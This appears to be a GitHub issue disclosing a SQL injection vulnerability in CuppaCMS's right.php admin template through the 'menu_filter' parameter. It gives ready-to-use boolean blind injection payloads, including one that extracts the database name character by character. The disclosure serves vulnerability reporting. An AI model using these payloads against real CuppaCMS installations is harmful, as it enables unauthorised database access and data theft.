Skip to content

SQL injection vulnerability exists in CuppaCMS /administrator/templates/default/html/windows/right.php #30

Open
@JiuBanSec

Description

  • VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
    “/administrator/templates/default/html/windows/right.php" via the "menu_filter=2" parameters.
  • Contact me:wanghu29570@gmail.com
  • Product:CuppaCMS
  • Payload Boolean true: menu_filter=2' and '1'='1
  • Payload Boolean false: menu_filter=2' and '1'='2
  • Payload exploit example: menu_filter=2'+and(ascii(substr((select(database())),1,1))>50)#
  • Proof of concept (POC):
    图片
  • Payload Boolean true: menu_filter=2' and '1'='1
    图片
  • Payload Boolean false: menu_filter=2' and '1'='2
  • You can see that the two return packets are different
    图片
  • Exploit:
    图片

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions